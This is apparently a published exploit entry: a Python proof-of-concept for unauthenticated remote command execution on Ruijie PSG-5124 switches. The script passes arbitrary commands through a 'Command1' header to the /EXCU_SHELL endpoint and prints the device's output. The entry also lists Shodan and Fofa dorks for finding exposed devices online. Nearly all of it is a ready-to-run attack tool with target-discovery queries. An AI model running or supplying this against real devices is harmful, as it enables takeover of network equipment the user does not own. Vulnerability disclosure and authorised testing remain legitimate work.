Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)

#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Shodan Dork: http.html_hash:-1402735717
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)

import http.client
import argparse

def send_request(ip, port, command):
    headers = {
        "Host": f"{ip}:{port}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "DNT": "1",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Cmdnum": "1",
        "Confirm1": "n",
        "Content-Length": "0",
        "Command1": command
    }

    try:
        connection = http.client.HTTPConnection(f"{ip}:{port}")
        connection.request("GET", "/EXCU_SHELL", headers=headers)
        response = connection.getresponse()


        print(f"Status Code: {response.status}")
        print(response.read().decode('utf-8'))
        connection.close()

    except Exception as e:
        print(f"Request failed: {e}")

if __name__ == "__main__":

    parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
    parser.add_argument('--ip', help='Target IP address', required=True)
    parser.add_argument('--port', help='Port', required=True)
    parser.add_argument('--cmd', help='Command', required=True)
    args = parser.parse_args()


    ip = args.ip
    port = args.port
    command = args.cmd


    send_request(ip, port, command)